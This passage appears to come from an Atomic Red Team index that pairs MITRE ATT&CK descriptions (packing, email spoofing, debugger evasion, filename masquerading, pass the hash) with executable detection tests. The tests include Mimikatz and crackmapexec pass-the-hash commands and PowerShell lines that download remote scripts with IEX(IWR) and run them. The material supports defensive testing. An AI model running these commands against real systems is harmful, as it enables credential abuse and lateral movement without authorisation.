- Jared Atkinson, @jaredcatkinson
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
atomic_tests: []
T1027.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--deb98323-e13f-4b0c-8d94-175379069062
created: '2020-02-05T14:17:46.686Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/002
external_id: T1027.002
- source_name: Awesome Executable Packing
description: Alexandre D'Hondt. (n.d.). Awesome Executable Packing. Retrieved
March 11, 2022.
url: https://github.com/dhondta/awesome-executable-packing
- source_name: ESET FinFisher Jan 2018
description: Kafka, F. (2018, January). ESET's Guide to Deobfuscating and
Devirtualizing FinFisher. Retrieved August 12, 2019.
url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:29.503Z'
name: 'Obfuscated Files or Information: Software Packing'
description: "Adversaries may perform software packing or virtual machine software
protection to conceal their code. Software packing is a method of compressing
or encrypting an executable. Packing an executable changes the file signature
in an attempt to avoid signature-based detection. Most decompression techniques
decompress the executable code in memory. Virtual machine software protection
translates an executable's original code into a special format that only a
special virtual machine can run. A virtual machine is then called to run this
code.(Citation: ESET FinFisher Jan 2018) \n\nUtilities used to perform software
packing are called packers. Example packers are MPRESS and UPX. A more comprehensive
list of known packers is available, but adversaries may create their own packing
techniques that do not leave the same artifacts as well-known packers to evade
defenses.(Citation: Awesome Executable Packing) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Filip Kafka, ESET
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.3'
identifier: T1027.002
atomic_tests:
- name: Binary simply packed by UPX (linux)
auto_generated_guid: 11c46cd8-e471-450e-acb8-52a1216ae6a4
description: |
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
No other protection/compression were applied.
supported_platforms:
- linux
input_arguments:
bin_path:
description: Packed binary
type: path
default: PathToAtomicsFolder/T1027.002/bin/linux/test_upx
executor:
command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
'
cleanup_command: 'rm /tmp/packed_bin
'
name: sh
- name: Binary packed by UPX, with modified headers (linux)
auto_generated_guid: f06197f8-ff46-48c2-a0c6-afc1b50665e1
description: |
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected
by some methods, and especially UPX is not able to uncompress it any more.
supported_platforms:
- linux
input_arguments:
bin_path:
description: Packed binary
type: path
default: PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed
executor:
command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
'
cleanup_command: 'rm /tmp/packed_bin
'
name: sh
- name: Binary simply packed by UPX
auto_generated_guid: b16ef901-00bb-4dda-b4fc-a04db5067e20
description: |
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
No other protection/compression were applied.
supported_platforms:
- macos
input_arguments:
bin_path:
description: Packed binary
type: path
default: PathToAtomicsFolder/T1027.002/bin/darwin/test_upx
executor:
command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
'
cleanup_command: 'rm /tmp/packed_bin
'
name: sh
- name: Binary packed by UPX, with modified headers
auto_generated_guid: 4d46e16b-5765-4046-9f25-a600d3e65e4d
description: |
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected
by some methods, and especially UPX is not able to uncompress it any more.
supported_platforms:
- macos
input_arguments:
bin_path:
description: Packed binary
type: path
default: PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed
executor:
command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
'
cleanup_command: 'rm /tmp/packed_bin
'
name: sh
T1564.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04
created: '2020-06-28T22:55:55.719Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1564/005
external_id: T1564.005
- source_name: MalwareTech VFS Nov 2014
description: Hutchins, M. (2014, November 28). Virtual File Systems for Beginners.
Retrieved June 22, 2020.
url: https://www.malwaretech.com/2014/11/virtual-file-systems-for-beginners.html
- source_name: FireEye Bootkits
description: 'Andonov, D., et al. (2015, December 7). Thriving Beyond The
Operating System: Financial Threat Group Targets Volume Boot Record. Retrieved
May 13, 2016.'
url: https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html
- source_name: ESET ComRAT May 2020
description: 'Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year
journey. Retrieved June 15, 2020.'
url: https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
- source_name: Kaspersky Equation QA
description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
Equation Group: Questions and Answers. Retrieved December 21, 2015.'
url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:29.855Z'
name: Hidden File System
description: |-
Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
Adversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.1'
atomic_tests: []
T1672:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--e1c2db92-7ae3-4e6a-90b4-157c1c1565cb
created: '2025-03-24T16:52:14.061Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1672
external_id: T1672
- source_name: Cloudflare DMARC, DKIM, and SPF
description: Cloudflare. (n.d.). What are DMARC, DKIM, and SPF?. Retrieved
April 8, 2025.
url: https://www.cloudflare.com/learning/email-security/dmarc-dkim-spf/
- source_name: DMARC-overview
description: DMARC. (n.d.). Retrieved March 24, 2025.
url: https://dmarc.org/overview
- source_name: ic3-dprk
description: FBI, State Department, NSA. (2024, May 2). North Korean Actors
Exploit Weak DMARC Security Policies to Mask Spearphishing Efforts. Retrieved
April 2, 2025.
url: https://www.ic3.gov/CSA/2024/240502.pdf
- source_name: Proofpoint TA427 April 2024
description: 'Lesnewich, G. et al. (2024, April 16). From Social Engineering
to DMARC Abuse: TA427’s Art of Information Gathering. Retrieved May 3, 2024.'
url: https://www.proofpoint.com/us/blog/threat-insight/social-engineering-dmarc-abuse-ta427s-art-information-gathering
- source_name: Proofpoint-DMARC
description: Proofpoint. (n.d.). Retrieved March 24, 2025.
url: https://www.proofpoint.com/us/threat-reference/dmarc
- source_name: Barnea DirectSend
description: Tom Barnea. (2025, September 9). Ongoing Campaign Abuses Microsoft
365’s Direct Send to Deliver Phishing Emails. Retrieved September 24, 2025.
url: https://www.varonis.com/blog/direct-send-exploit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-09-24T21:03:46.869Z'
name: Email Spoofing
description: "Adversaries may fake, or spoof, a sender’s identity by modifying
the value of relevant email headers in order to establish contact with victims
under false pretenses.(Citation: Proofpoint TA427 April 2024) In addition
to actual email content, email headers (such as the FROM header, which contains
the email address of the sender) may also be modified. Email clients display
these headers when emails appear in a victim's inbox, which may cause modified
emails to appear as if they were from the spoofed entity. \n\nThis behavior
may succeed when the spoofed entity either does not enable or enforce identity
authentication tools such as Sender Policy Framework (SPF), DomainKeys Identified
Mail (DKIM), and/or Domain-based Message Authentication, Reporting and Conformance
(DMARC).(Citation: Cloudflare DMARC, DKIM, and SPF)(Citation: DMARC-overview)(Citation:
Proofpoint-DMARC) Even if SPF and DKIM are configured properly, spoofing may
still succeed when a domain sets a weak DMARC policy such as `v=DMARC1; p=none;
fo=1;`. This means that while DMARC is technically present, email servers
are not instructed to take any filtering action when emails fail authentication
checks.(Citation: Proofpoint TA427 April 2024)(Citation: ic3-dprk)\n\nAdversaries
may abuse Microsoft 365’s Direct Send functionality to spoof internal users
by using internal devices like printers to send emails without authentication.(Citation:
Barnea DirectSend) Adversaries may also abuse absent or weakly configured
SPF, SKIM, and/or DMARC policies to conceal social engineering attempts(Citation:
ic3-dprk) such as [Phishing](https://attack.mitre.org/techniques/T1566). They
may also leverage email spoofing for [Impersonation](https://attack.mitre.org/techniques/T1656)
of legitimate external individuals and organizations, such as journalists
and academics.(Citation: ic3-dprk)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.3.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Office Suite
- Windows
- macOS
- Linux
x_mitre_version: '1.1'
atomic_tests: []
T1055.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744
created: '2020-01-14T01:30:41.092Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1055/005
external_id: T1055.005
- source_name: Elastic Process Injection July 2017
description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: FireEye TLS Nov 2017
description: Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif
Variant Employs Malicious TLS Callback Technique to Achieve Process Injection.
Retrieved December 18, 2017.
url: https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:32.111Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
well as possibly elevate privileges. TLS callback injection is a method of
executing arbitrary code in the address space of a separate live process.
\n\nTLS callback injection involves manipulating pointers inside a portable
executable (PE) to redirect a process to malicious code before reaching the
code's legitimate entry point. TLS callbacks are normally used by the OS to
setup and/or cleanup data used by threads. Manipulating TLS callbacks may
be performed by allocating and writing to specific offsets within a process’
memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055)
techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation:
FireEye TLS Nov 2017)\n\nRunning code in the context of another process may
allow access to the process's memory, system/network resources, and possibly
elevated privileges. Execution via TLS callback injection may also evade detection
from security products since the execution is masked under a legitimate process. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
atomic_tests: []
T1622:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--e4dc8c01-417f-458d-9ee0-bb0617c1b391
created: '2022-04-01T17:59:46.156Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1622
external_id: T1622
- source_name: Apriorit
description: Apriorit. (2024, June 4). Anti Debugging Protection Techniques
with Examples. Retrieved March 4, 2025.
url: https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software
- source_name: Checkpoint Dridex Jan 2021
description: 'Check Point Research. (2021, January 4). Stopping Serial Killer:
Catching the Next Strike. Retrieved September 7, 2021.'
url: https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/
- source_name: hasherezade debug
description: hasherezade. (2021, June 30). Module 3 - Understanding and countering
malware's evasion and self-defence. Retrieved April 1, 2022.
url: https://github.com/hasherezade/malware_training_vol1/blob/main/slides/module3/Module3_2_fingerprinting.pdf
- source_name: Cado Security P2PInfect 2023
description: jbowen. (2023, December 4). P2Pinfect - New Variant Targets MIPS
Devices. Retrieved March 18, 2025.
url: https://www.cadosecurity.com/blog/p2pinfect-new-variant-targets-mips-devices
- source_name: AlKhaser Debug
description: Noteworthy. (2019, January 6). Al-Khaser. Retrieved April 1,
2022.
url: https://github.com/LordNoteworthy/al-khaser/tree/master/al-khaser/AntiDebug
- source_name: wardle evilquest partii
description: 'Patrick Wardle. (2020, July 3). OSX.EvilQuest Uncovered part
ii: insidious capabilities. Retrieved March 21, 2021.'
url: https://objective-see.com/blog/blog_0x60.html
- source_name: ProcessHacker Github
description: ProcessHacker. (2009, October 27). Process Hacker. Retrieved
April 11, 2022.
url: https://github.com/processhacker/processhacker
- source_name: Positive Technologies Hellhounds 2023
description: 'PT Expert Security Center. (2023, November 29). Hellhounds:
operation Lahat. Retrieved March 18, 2025.'
url: https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/hellhounds-operation-lahat
- source_name: vxunderground debug
description: vxunderground. (2021, June 30). VX-API. Retrieved April 1, 2022.
url: https://github.com/vxunderground/VX-API/tree/main/Anti%20Debug
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:32.196Z'
name: Debugger Evasion
description: |-
Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.(Citation: ProcessHacker Github)
Debugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.
Specific checks will vary based on the target and/or adversary. On Windows, this may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent() and NtQueryInformationProcess(), or manually checking the BeingDebugged flag of the Process Environment Block (PEB). On Linux, this may involve querying `/proc/self/status` for the `TracerPID` field, which indicates whether or not the process is being traced by dynamic analysis tools.(Citation: Cado Security P2PInfect 2023)(Citation: Positive Technologies Hellhounds 2023) Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Malware may also leverage Structured Exception Handling (SEH) to detect debuggers by throwing an exception and detecting whether the process is suspended. SEH handles both hardware and software expectations, providing control over the exceptions including support for debugging. If a debugger is present, the program’s control will be transferred to the debugger, and the execution of the code will be suspended. If the debugger is not present, control will be transferred to the SEH handler, which will automatically handle the exception and allow the program’s execution to continue.(Citation: Apriorit)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW().(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- TruKno
- Joas Antonio dos Santos, @C0d3Cr4zy
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.1'
identifier: T1622
atomic_tests:
- name: Detect a Debugger Presence in the Machine
auto_generated_guid: 58bd8c8d-3a1a-4467-a69c-439c75469b07
description: Detecting a running debugger process or if the debugger is attached
to a process via PowerShell
supported_platforms:
- windows
executor:
command: "# Check for common debugger processes\n$debuggerProcesses = Get-Process
| Where-Object { $_.ProcessName -match \"dbg\" -or $_.ProcessName -match
\"debug\" }\n# Check for debugging flags\n$debuggingFlags = [System.Diagnostics.Debugger]::IsAttached "
name: powershell
elevation_required: true
T1036.006:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--e51137a5-1cdc-499e-911a-abaedaa5ac86
created: '2020-02-10T20:47:10.082Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1036/006
external_id: T1036.006
- source_name: Mac Backdoors are back
description: Dan Goodin. (2016, July 6). After hiatus, in-the-wild Mac backdoors
are suddenly back. Retrieved July 8, 2017.
url: https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:32.287Z'
name: 'Masquerading: Space after Filename'
description: |-
Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.
For example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to evil.txt (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).
Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Erye Hernandez, Palo Alto Networks
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
x_mitre_version: '1.1'
identifier: T1036.006
atomic_tests:
- name: Space After Filename (Manual)
auto_generated_guid: 89a7dd26-e510-4c9f-9b15-f3bae333360f
description: 'Space After Filename
'
supported_platforms:
- macos
executor:
steps: "1. echo '#!/bin/bash\\necho \"print \\\"hello, world!\\\"\" | /usr/bin/python\\nexit'
> execute.txt && chmod +x execute.txt\n\n2. mv execute.txt \"execute.txt
\"\n\n3. ./execute.txt\\ \n"
name: manual
- name: Space After Filename
auto_generated_guid: b95ce2eb-a093-4cd8-938d-5258cef656ea
description: 'Space after filename.
'
supported_platforms:
- macos
- linux
executor:
name: sh
command: |
mkdir -p /tmp/atomic-test-T1036.006
cd /tmp/atomic-test-T1036.006
mkdir -p 'testdirwithspaceend '
[ "$(uname)" = 'FreeBSD' ] && /bin/echo "#\!/bin/sh" > "testdirwithspaceend /init " && echo 'echo "print(\"running T1035.006 with space after filename to masquerade init\")" | python3.9' >> "testdirwithspaceend /init " && echo "exit" >> "testdirwithspaceend /init " || /usr/bin/echo -e "%d\na\n#!/usr/bin/perl\nprint \"running T1035.006 with space after filename to masquerade init\\n\";\nqx/cp \/usr\/bin\/perl 'init '/;\nqx/'.\/init ' -e 'sleep 5'/;\n.\nwq\n" | ed 'testdirwithspaceend /init ' >/dev/null
chmod +x 'testdirwithspaceend /init '
'./testdirwithspaceend /init '
cleanup_command: rm -rf /tmp/atomic-test-T1036.006
T1550.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e
created: '2020-01-30T16:36:51.184Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/002
external_id: T1550.002
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:32.459Z'
name: 'Use Alternate Authentication Material: Pass the Hash'
description: |-
Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.
When performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.
Adversaries may also use stolen password hashes to "overpass the hash." Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: lateral-movement
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Blake Strom, Microsoft 365 Defender
- Travis Smith, Tripwire
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.3'
identifier: T1550.002
atomic_tests:
- name: Mimikatz Pass the Hash
auto_generated_guid: ec23cef9-27d9-46e4-a68d-6f75f7b86908
description: |
Note: must dump hashes first
[Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)
supported_platforms:
- windows
input_arguments:
user_name:
description: username
type: string
default: Administrator
ntlm:
description: ntlm hash
type: string
default: cc36cf7a8514893efccd3324464tkg1a
domain:
description: domain
type: string
default: "%userdnsdomain%"
mimikatz_path:
description: mimikatz windows executable
type: path
default: "%tmp%\\mimikatz\\x64\\mimikatz.exe"
dependency_executor_name: powershell
dependencies:
- description: 'Mimikatz executor must exist on disk and at specified location
(#{mimikatz_path})
'
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
get_prereq_command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1\"
-UseBasicParsing) \n$releases = \"https://api.github.com/repos/gentilkiwi/mimikatz/releases\"\n$zipUrl
= (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url
| where-object { $_.endswith(\".zip\") }\n$mimikatz_exe = cmd /c echo #{mimikatz_path}\n$basePath
= Split-Path $mimikatz_exe | Split-Path\nInvoke-FetchFromZip $zipUrl \"x64/mimikatz.exe\"
$basePath\n"
executor:
command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain}
/ntlm:#{ntlm}"
'
name: command_prompt
- name: crackmapexec Pass the Hash
auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9
description: 'command execute with crackmapexec
'
supported_platforms:
- windows
input_arguments:
user_name:
description: username
type: string
default: Administrator
crackmapexec_exe:
description: crackmapexec windows executable
type: path
default: C:\CrackMapExecWin\crackmapexec.exe
command:
description: command to execute
type: string
default: whoami
ntlm:
description: command
type: string
default: cc36cf7a8514893efccd3324464tkg1a
domain:
description: domain
type: string
default: "%userdnsdomain%"
dependency_executor_name: powershell
dependencies:
- description: 'CrackMapExec executor must exist on disk at specified location
(#{crackmapexec_exe})
'
prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1}
'
get_prereq_command: 'Write-Host Automated installer not implemented yet, please
install crackmapexec manually at this location: #{crackmapexec_exe}
'
executor:
command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n"
name: command_prompt
- name: Invoke-WMIExec Pass the Hash
auto_generated_guid: f8757545-b00a-4e4e-8cfb-8cfb961ee713
description: |-
Use Invoke-WMIExec to Pass the Hash
Note: must dump hashes first
[Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)
supported_platforms:
- windows
input_arguments:
ntlm:
description: ntlm hash
type: string
default: cc36cf7a8514893efccd3324464tkg1a
user_name:
description: username
type: string
default: Administrator
command:
description: Command to run on target system
type: string
default: hostname
target:
description: System to run command on
type: string
default: "$env:COMPUTERNAME"
executor:
command: |-
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
name: powershell
T1216.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--e6f19759-dde3-47fc-99cc-d9f5fa4ade60
created: '2024-02-06T16:20:41.647Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1216/002
external_id: T1216.002
- source_name: 4 - appv
description: John Fokker. (2022, March 17). Suspected DarkHotel APT activity
update. Retrieved February 6, 2024.
url: https://www.trellix.com/en-ca/about/newsroom/stories/research/suspected-darkhotel-apt-activity-update/
- source_name: 2 - appv
description: Microsoft. (2022, November 3). Getting started with App-V for
Windows client. Retrieved February 6, 2024.
url: https://learn.microsoft.com/en-us/windows/application-management/app-v/appv-getting-started
- source_name: 5 - appv
description: Nick Landers, Casey Smith. (n.d.). /Syncappvpublishingserver.vbs.
Retrieved February 6, 2024.
url: https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/
- source_name: 7 - appv
description: Nick Landers. (2017, August 8). Need a signed alternative to
Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
Retrieved September 12, 2024.
url: https://x.com/monoxgas/status/895045566090010624
- source_name: 3 - appv
description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
Evasion (T1202). Retrieved February 6, 2024.'
url: https://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/
- source_name: 1 - appv
description: SEONGSU PARK. (2022, December 27). BlueNoroff introduces new
methods bypassing MoTW. Retrieved February 6, 2024.
url: https://securelist.com/bluenoroff-methods-bypass-motw/108383/
- source_name: 6 - appv
description: Strontic. (n.d.). SyncAppvPublishingServer.exe. Retrieved February
6, 2024.
url: https://strontic.github.io/xcyclopedia/library/SyncAppvPublishingServer.exe-3C291419F60CDF9C2E4E19AD89944FA3.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T23:13:55.573Z'
name: SyncAppvPublishingServer
description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
SyncAppvPublishingServer.vbs is a Visual Basic script associated with how
Windows virtualizes applications (Microsoft Application Virtualization, or
App-V).(Citation: 1 - appv) For example, Windows may render Win32 applications
to users as virtual applications, allowing users to launch and interact with
them as if they were installed locally.(Citation: 2 - appv)(Citation: 3 -
appv)\n \nThe SyncAppvPublishingServer.vbs script is legitimate, may be
signed by Microsoft, and is commonly executed from `\\System32` through the
command line via `wscript.exe`.(Citation: 4 - appv)(Citation: 5 - appv)\n\nAdversaries
